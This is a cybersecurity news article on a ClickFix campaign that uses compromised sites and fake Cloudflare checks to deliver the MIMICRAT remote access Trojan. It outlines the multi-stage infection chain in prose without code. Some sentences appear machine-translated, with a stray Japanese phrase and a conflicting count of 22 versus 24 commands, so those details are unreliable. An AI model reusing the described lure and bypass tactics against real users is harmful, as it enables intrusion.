Cybersecurity researchers have revealed details of a new ClickFix campaign that exploits compromised legitimate sites to deliver a previously undocumented remote access Trojan (RAT) called MIMICRAT (also known as AstarionRAT).
“This campaign demonstrates a high level of operational sophistication, with compromised sites across multiple industries and geographies serving as the delivery infrastructure, a multi-stage PowerShell chain performing ETW and AMSI bypass before dropping a Lua-scripted shellcode loader, and the final implant communicating over HTTPS on port 443 using an HTTP profile similar to legitimate web analytics traffic,” Elastic Security Labs said in a Friday report.
According to the enterprise search and cybersecurity company, MIMICRAT is a custom C++ RAT that supports Windows token impersonation, SOCKS5 tunneling, and a set of 22 commands for comprehensive post-exploitation functionality. The campaign was discovered earlier this month.
There is also tactical and infrastructure overlap with another ClickFix campaign documented by Huntress, leading to the deployment of the Matanbuchus 3.0 loader, which is assessed to serve as a conduit for the same RAT. The ultimate goal of the attack is believed to be ransomware deployment or data leakage.
In the infection sequence highlighted in Elastic, the entry point is bincheck[.]io, a legitimate Bank Identification Number (BIN) verification service, was compromised to inject malicious JavaScript code that loaded an externally hosted PHP script. The PHP script then displays a fake Cloudflare verification page and uses Windows to address the issue.[ファイル名を指定して実行]It delivers the ClickFix decoy by instructing the victim to copy and paste a command into a dialog.
This runs a PowerShell command that connects to the command and control (C2) server to retrieve a second stage PowerShell script that patches the Windows Event Log (ETW) and antivirus scanning (AMSI) before dropping the Lua-based loader. In the final stage, the Lua script is decrypted and the shellcode that serves MIMICRAT is executed in memory.
The Trojan uses HTTPS to communicate with the C2 server and can accept 24 commands for process and file system control, interactive shell access, token manipulation, shellcode injection, and SOCKS proxy tunneling.
“The campaign supports 17 languages, and the lure content is dynamically localized based on the victim’s browser language settings, increasing its effective reach,” said security researcher Salim Bittam. “Identified victims span multiple geographies, including a U.S.-based university and multiple Chinese-speaking users documented in public forum discussions, suggesting widespread opportunistic targeting.”
Source link
